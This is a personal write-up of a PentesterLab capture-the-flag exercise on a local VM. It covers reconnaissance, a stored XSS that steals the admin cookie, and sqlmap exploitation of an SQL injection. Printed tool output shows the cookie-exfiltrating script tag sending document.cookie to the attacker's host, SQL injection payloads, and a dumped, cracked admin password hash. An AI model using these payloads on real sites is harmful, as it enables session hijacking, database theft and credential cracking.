Introduction
I’m writing this topic at first to learn the Web pentesting in deep and the second one for the pleasure to hack ;)
So today I’m going to explain this challenge. This is quite different from my last writeup ( HackTheBox). The machine is not on line, but on my local machine.
Let’s roll ;)
The Architecture
I’ve got 2 machines. The first one is my DEBIAN for the penetration test, and the second one, the VM of the challenge. I’ve configured it in DHCP on my network.
Scenario
This exercise explains how you can use a Cross-Site Scripting vulnerability to get access to an administrator’s cookies. Then how you can use his/her session to gain access to the administration to find a SQL injection and gain code execution using it. — From https://pentesterlab.com/exercises/xss_and_mysql_file
Reconnaissance
The first thing we are going to do is to find our machine on the Lab network.
sudo netdiscover -r 192.168.0.0/24 -p
I know my IP addresses so, the VM of the CTF is at 192.168.0.28
Well, the next step is to list the ports and services of the machine
nmap 192.168.0.28 -oX xss_mysql.xml
Starting Nmap 7.40 ( https://nmap.org ) at 2018–03–19 17:46 CET
Nmap scan report for 192.168.0.28
Host is up (0.00039s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:49:8D:69 (VMware)Nmap done: 1 IP address (1 host up) scanned in 2.93 seconds
Then, searching the version of the both services. I’ve used metasploit for more clarity. I’ve imported the result of Nmap on MSF
msf > db_nmap -sV 192.168.0.28
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2018–03–19 18:02 CET
[*] Nmap: Nmap scan report for 192.168.0.28
[*] Nmap: Host is up (0.00034s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze4 (protocol 2.0)
[*] Nmap: 80/tcp open http Apache httpd 2.2.16 ((Debian))
[*] Nmap: MAC Address: 00:0C:29:49:8D:69 (VMware)
[*] Nmap: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 14.29 seconds
msf > services
Services
========host port proto name state info
— — — — — — — — — — — — — —
192.168.0.28 80 tcp http open Apache httpd 2.2.16 (Debian)
192.168.0.28 22 tcp ssh open OpenSSH 5.5p1 Debian 6+squeeze4 protocol 2.0msf > hosts
Hosts
=====address mac name os_name os_flavor os_sp purpose info comments
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
192.168.0.28 00:0c:29:49:8d:69 Linux 2.6.X server
We can see that we have 2 services on the VM meaning a web server under Apache 2.2.16 and an remote access. ( SSH) . The host is a Linux .
We would see the result on each devices we found.
We have enough information to continue our stuff. BTW our intrusion vector is the website. The system could be, but we are on CTF to work with
web weakness, so we are going to enter by this vector.
Weakness
With all information we have , we can find different vulnerabilities.
root@Debian:/home/user/Documents/pentesting/PentesterLab# nikto -h 192.168.0.28 -o vulns.xml
- Nikto v2.1.6
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Target IP: 192.168.0.28
+ Target Hostname: 192.168.0.28
+ Target Port: 80
+ Start Time: 2018–03–19 18:12:48 (GMT1)
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.3–7+squeeze18
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 7239, size: 14634, mtime: Thu Oct 10 09:47:14 2013
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is “http://127.0.0.1/images/”.
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user ‘test’ password ‘test’ to verify.
+ OSVDB-12184: /?=PHPB8B5F2A0–3C92–11d3-A3A9–4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428–11d2-A769–00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428–11d2-A769–00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428–11d2-A769–00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/login.php: Admin login page/section found.
+ 8346 requests: 0 error(s) and 21 item(s) reported on remote host
+ End Time: 2018–03–19 18:13:01 (GMT1) (13 seconds)
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ 1 host(s) tested
The vulnerabilities are underlined for more visibility. For exemple, the httponly flag is not setting up, the header The X-XSS-Protection. These elements told us we could be in presence of XSS vulnerability.
The next step, is to verify it to be really sure of that.
To do that, we browse on the website to leave a comment with this code and see what happens. If the pop with the message “XSS detected, we are well in presence of an XSS vulnerability.
The detection
<script>alert(‘XSS detected’)</script>
Let’s do it ;)
So, we are in fact in presence of a XSS vulnerability.
Exploitation
As we found the entry point , we are going to exploit it. The best thing is to leave a comment on the website to steal the admin cookie. We can after use it to elevate our privilege account.
Let’s do it !
Above, the command to steal the admin cookie. To do that, exploit a persistence XSS. We redirect the response on our web server in local ( socat).
Next, the admin cookie showed up on our screen !!!
Then, we have to pick up the cookie session into our browser. I used the standard tool on a Firefox.
We are admin of the website without any password, that’s cool, isn’t it ?
What can we do by now ?
We are going to browse our new privilege on the web page and see if we can find an other weakness.
We found we can add a comment with the admin rule. We just want test if we could find an SQLi !. This could allow us to get the password of the website.
Detection SQLi
The id=1 appears to be vulnerable. Let’s confirm it.
The test consists of putting on a comma to see an error if it’s vulnerable.
Bingo !! We have an error wish give us a the name of the database ( mysql) and the path ( /var/www/classes/) wish is LOAD_FILE() function.
Exploitation
The last step is to exploit this new vulnerability. To do that, we are going to use “ SQLMAP”. So, ready , go !!
We need the IP address and the cookie of the admin we stolen before.
In this challenge, I’ve re-stolen the cookie because I had some problems….
sqlmap -u 192.168.0.28/admin/edit.php?id=1 — cookie PHPSESSID=lvaareppkskktdg09g09e2dtm4
___
__H__
___ ___[(]_____ ___ ___ {1.1.2#stable}
|_ -| . [(] | .’| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:39:54
[16:39:54] [INFO] testing connection to the target URL
[16:39:55] [INFO] heuristics detected web page charset ‘ascii’
[16:39:55] [INFO] testing if the target URL is stable
[16:39:56] [INFO] target URL is stable
[16:39:56] [INFO] testing if GET parameter ‘id’ is dynamic
[16:39:56] [INFO] confirming that GET parameter ‘id’ is dynamic
[16:39:56] [INFO] GET parameter ‘id’ is dynamic
[16:39:56] [INFO] heuristic (basic) test shows that GET parameter ‘id’ might be injectable (possible DBMS: ‘MySQL’)
[16:39:56] [INFO] testing for SQL injection on GET parameter ‘id’
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n] y
[16:40:04] [INFO] testing ‘AND boolean-based blind — WHERE or HAVING clause’
[16:40:04] [WARNING] reflective value(s) found and filtering out
[16:40:04] [INFO] GET parameter ‘id’ appears to be ‘AND boolean-based blind — WHERE or HAVING clause’ injectable
[16:40:04] [INFO] testing ‘MySQL >= 5.5 AND error-based — WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)’
[16:40:04] [INFO] testing ‘MySQL >= 5.5 OR error-based — WHERE, HAVING clause (BIGINT UNSIGNED)’
[16:40:04] [INFO] testing ‘MySQL >= 5.5 AND error-based — WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)’
[16:40:04] [INFO] testing ‘MySQL >= 5.5 OR error-based — WHERE, HAVING clause (EXP)’
[16:40:04] [INFO] testing ‘MySQL >= 5.7.8 AND error-based — WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)’
[16:40:04] [INFO] testing ‘MySQL >= 5.7.8 OR error-based — WHERE, HAVING clause (JSON_KEYS)’
[16:40:04] [INFO] testing ‘MySQL >= 5.0 AND error-based — WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[16:40:04] [INFO] testing ‘MySQL >= 5.0 OR error-based — WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[16:40:04] [INFO] testing ‘MySQL >= 5.1 AND error-based — WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)’
[16:40:04] [INFO] testing ‘MySQL >= 5.1 OR error-based — WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)’
[16:40:04] [INFO] testing ‘MySQL >= 5.1 AND error-based — WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)’
[16:40:04] [INFO] testing ‘MySQL >= 5.1 OR error-based — WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)’
[16:40:04] [INFO] testing ‘MySQL >= 4.1 AND error-based — WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[16:40:04] [INFO] testing ‘MySQL >= 4.1 OR error-based — WHERE, HAVING clause (FLOOR)’
[16:40:04] [INFO] testing ‘MySQL OR error-based — WHERE or HAVING clause (FLOOR)’
[16:40:04] [INFO] testing ‘MySQL >= 5.1 error-based — PROCEDURE ANALYSE (EXTRACTVALUE)’
[16:40:04] [INFO] testing ‘MySQL >= 5.5 error-based — Parameter replace (BIGINT UNSIGNED)’
[16:40:04] [INFO] testing ‘MySQL >= 5.5 error-based — Parameter replace (EXP)’
[16:40:04] [INFO] testing ‘MySQL >= 5.7.8 error-based — Parameter replace (JSON_KEYS)’
[16:40:04] [INFO] testing ‘MySQL >= 5.0 error-based — Parameter replace (FLOOR)’
[16:40:04] [INFO] testing ‘MySQL >= 5.1 error-based — Parameter replace (UPDATEXML)’
[16:40:04] [INFO] testing ‘MySQL >= 5.1 error-based — Parameter replace (EXTRACTVALUE)’
[16:40:04] [INFO] testing ‘MySQL inline queries’
[16:40:04] [INFO] testing ‘MySQL > 5.0.11 stacked queries (comment)’
[16:40:04] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
[16:40:04] [INFO] testing ‘MySQL > 5.0.11 stacked queries (query SLEEP — comment)’
[16:40:04] [INFO] testing ‘MySQL > 5.0.11 stacked queries (query SLEEP)’
[16:40:04] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query — comment)’
[16:40:04] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query)’
[16:40:04] [INFO] testing ‘MySQL >= 5.0.12 AND time-based blind’
[16:40:14] [INFO] GET parameter ‘id’ appears to be ‘MySQL >= 5.0.12 AND time-based blind’ injectable
[16:40:14] [INFO] testing ‘Generic UNION query (NULL) — 1 to 20 columns’
[16:40:14] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:40:14] [INFO] ‘ORDER BY’ technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:40:14] [INFO] target URL appears to have 4 columns in query
[16:40:14] [INFO] GET parameter ‘id’ is ‘Generic UNION query (NULL) — 1 to 20 columns’ injectable
[16:40:14] [WARNING] parameter length constrainting mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter ‘id’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 56 HTTP(s) requests:
— -
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind — WHERE or HAVING clause
Payload: id=1 AND 9807=9807Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)Type: UNION query
Title: Generic UNION query (NULL) — 4 columns
Payload: id=-4152 UNION ALL SELECT NULL,NULL,CONCAT(0x71787a7871,0x506a6c634672744444686b454d7041426d506978674a477451655567744c55734762697041445572,0x7178707671),NULL — tADo
— -
[16:40:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.12
[16:40:18] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/192.168.0.28’[*] shutting down at 16:40:18
The underline shows that we are in presence of blind SQLi
The next step is to dump the data base. We used the word “ DUMP” for SQLMAP.
root@Debian:/home/user/Documents/pentesting/tools/web/xsser_1.7–1/xsser-public# sqlmap -u 192.168.0.28/admin/edit.php?id=1 — cookie PHPSESSID=lvaareppkskktdg09g09e2dtm4 — dump
___
__H__
___ ___[(]_____ ___ ___ {1.1.2#stable}
|_ -| . [,] | .’| . |
|___|_ [)]_|_|_|__,| _|
|_|V |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:42:41
[16:42:41] [INFO] resuming back-end DBMS ‘mysql’
[16:42:41] [INFO] testing connection to the target URL
[16:42:41] [INFO] heuristics detected web page charset ‘ascii’
sqlmap resumed the following injection point(s) from stored session:
— -
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind — WHERE or HAVING clause
Payload: id=1 AND 9807=9807Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)Type: UNION query
Title: Generic UNION query (NULL) — 4 columns
Payload: id=-4152 UNION ALL SELECT NULL,NULL,CONCAT(0x71787a7871,0x506a6c634672744444686b454d7041426d506978674a477451655567744c55734762697041445572,0x7178707671),NULL — tADo
— -
[16:42:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.12
[16:42:41] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[16:42:41] [INFO] fetching current database
[16:42:41] [WARNING] reflective value(s) found and filtering out
[16:42:41] [INFO] fetching tables for database: ‘blog’
[16:42:41] [INFO] the SQL query used returns 3 entries
[16:42:41] [INFO] retrieved: comments
[16:42:41] [INFO] retrieved: posts
[16:42:41] [INFO] retrieved: users
[16:42:41] [INFO] fetching columns for table ‘posts’ in database ‘blog’
[16:42:41] [INFO] the SQL query used returns 4 entries
[16:42:41] [INFO] retrieved: “id”,”mediumint(9)”
[16:42:41] [INFO] retrieved: “title”,”varchar(50)”
[16:42:41] [INFO] retrieved: “text”,”text”
[16:42:41] [INFO] retrieved: “published”,”datetime”
[16:42:41] [INFO] fetching entries for table ‘posts’ in database ‘blog’
[16:42:41] [INFO] the SQL query used returns 2 entries
[16:42:41] [INFO] retrieved: “1”,” “,”Welcome to my blog. Leave a comment if you like the new design :) “,”Welcome”
[16:42:41] [INFO] retrieved: “2”,” “,”Is it working?”,”Test”
[16:42:41] [INFO] analyzing table dump for possible password hashes
Database: blog
Table: posts
[2 entries]
+ — — + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + — — — — -+ — — — — — -+
| id | text | title | published |
+ — — + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + — — — — -+ — — — — — -+
| 1 | Welcome to my blog. Leave a comment if you like the new design :) | Welcome | NULL |
| 2 | Is it working? | Test | NULL |
+ — — + — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + — — — — -+ — — — — — -+[16:42:41] [INFO] table ‘blog.posts’ dumped to CSV file ‘/root/.sqlmap/output/192.168.0.28/dump/blog/posts.csv’
[16:42:41] [INFO] fetching columns for table ‘users’ in database ‘blog’
[16:42:41] [INFO] the SQL query used returns 3 entries
[16:42:41] [INFO] retrieved: “id”,”mediumint(9)”
[16:42:41] [INFO] retrieved: “login”,”varchar(50)”
[16:42:41] [INFO] retrieved: “password”,”varchar(50)”
[16:42:41] [INFO] fetching entries for table ‘users’ in database ‘blog’
[16:42:41] [INFO] the SQL query used returns 1 entries
[16:42:41] [INFO] retrieved: “1”,”admin”,”8efe310f9ab3efeae8d410a8e0166eb2"
[16:42:41] [INFO] analyzing table dump for possible password hashes
[16:42:41] [INFO] recognized possible password hashes in column ‘password’
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[16:42:46] [INFO] writing hashes to a temporary file ‘/tmp/sqlmaptC0ZK711833/sqlmaphashes-GIdvz6.txt’
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[16:42:51] [INFO] using hash method ‘md5_generic_passwd’
what dictionary do you want to use?
[1] default dictionary file ‘/usr/share/sqlmap/txt/wordlist.zip’ (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[16:42:56] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[16:43:00] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[16:43:00] [WARNING] multiprocessing hash cracking is currently not supported on this platform
[16:43:04] [INFO] cracked password ‘P4ssw0rd’ for user ‘admin’
[16:43:04] [INFO] postprocessing table dump
Database: blog
Table: users
[1 entry]
+ — — + — — — -+ — — — — — — — — — — — — — — — — — — — — — — -+
| id | login | password |
+ — — + — — — -+ — — — — — — — — — — — — — — — — — — — — — — -+
| 1 | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+ — — + — — — -+ — — — — — — — — — — — — — — — — — — — — — — -+[16:43:04] [INFO] table ‘blog.users’ dumped to CSV file ‘/root/.sqlmap/output/192.168.0.28/dump/blog/users.csv’
[16:43:04] [INFO] fetching columns for table ‘comments’ in database ‘blog’
[16:43:04] [INFO] the SQL query used returns 6 entries
[16:43:04] [INFO] retrieved: “id”,”mediumint(9)”
[16:43:04] [INFO] retrieved: “title”,”varchar(50)”
[16:43:04] [INFO] retrieved: “text”,”text”
[16:43:04] [INFO] retrieved: “author”,”varchar(50)”
[16:43:04] [INFO] retrieved: “published”,”datetime”
[16:43:04] [INFO] retrieved: “post_id”,”mediumint(9)”
[16:43:04] [INFO] fetching entries for table ‘comments’ in database ‘blog’
[16:43:04] [INFO] the SQL query used returns 9 entries
[16:43:04] [INFO] retrieved: “”,”1",”2",” “,” <script>alert(‘XSS vulnerability’)</script>”,”shell”
[16:43:04] [INFO] retrieved: “test”,”2",”1",” “,”<script>alert(‘Xss detected’)</script> “,”Test”
[16:43:04] [INFO] retrieved: “test”,”3",”1",” “,” <script>alert(‘XSS detected’)</script>”,”Test”
[16:43:04] [INFO] retrieved: “test”,”4",”1",” “,”<script>document.cookie</script>”,”Test”
[16:43:04] [INFO] retrieved: “test”,”5",”1",” “,” <script>document.write(‘<img src=”http://192.168.0.22/?’+document.cookie+’ “/>’);</script>”,”shell”
[16:43:04] [INFO] retrieved: “test”,”6",”1",” “,” <script>document.write(‘<img src=”http://192.168.0.22/?'+document.cookie+' “/>’);</script>”,”shell”
[16:43:04] [INFO] retrieved: “test”,”7",”2",” “,” <script>document.write(‘<img src=”http://192.168.0.22/?'+document.cookie+' “/>’);</script>”,”Test”
[16:43:04] [INFO] retrieved: “test”,”8",”2",” “,” <script>document.write(‘<img src=”http://192.168.0.22/?'+document.cookie+' “/>’);</script>”,”Test”
[16:43:04] [INFO] retrieved: “test”,”9",”1",” “,” <script>document.write(‘<img src=”http://192.168.0.22/?'+document.cookie+' “/>’);</script>”,”shell”
[16:43:04] [INFO] analyzing table dump for possible password hashes
Database: blog
Table: comments
[9 entries]
+ — — + — — — — -+ — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + — — — -+ — — — — -+ — — — — — -+
| id | post_id | text | title | author | published |
+ — — + — — — — -+ — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + — — — -+ — — — — -+ — — — — — -+
| 1 | 2 | <script>alert(‘XSS vulnerability’)</script> | shell | <blank> | NULL |
| 2 | 1 | <script>alert(‘Xss detected’)</script> | Test | test | NULL |
| 3 | 1 | <script>alert(‘XSS detected’)</script> | Test | test | NULL |
| 4 | 1 | <script>document.cookie</script> | Test | test | NULL |
| 5 | 1 | <script>document.write(‘<img src=”http://192.168.0.22/?’+document.cookie+’ “/>’);</script> | shell | test | NULL |
| 6 | 1 | <script>document.write(‘<img src=”http://192.168.0.22/?’+document.cookie+’ “/>’);</script> | shell | test | NULL |
| 7 | 2 | <script>document.write(‘<img src=”http://192.168.0.22/?’+document.cookie+’ “/>’);</script> | Test | test | NULL |
| 8 | 2 | <script>document.write(‘<img src=”http://192.168.0.22/?’+document.cookie+’ “/>’);</script> | Test | test | NULL |
| 9 | 1 | <script>document.write(‘<img src=”http://192.168.0.22/?’+document.cookie+' “/>’);</script> | shell | test | NULL |
+ — — + — — — — -+ — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — + — — — -+ — — — — -+ — — — — — -+[16:43:04] [INFO] table ‘blog.comments’ dumped to CSV file ‘/root/.sqlmap/output/192.168.0.28/dump/blog/comments.csv’
[16:43:04] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/192.168.0.28’[*] shutting down at 16:43:04
So, we cracked the password of the database. Next, we cheeked it.
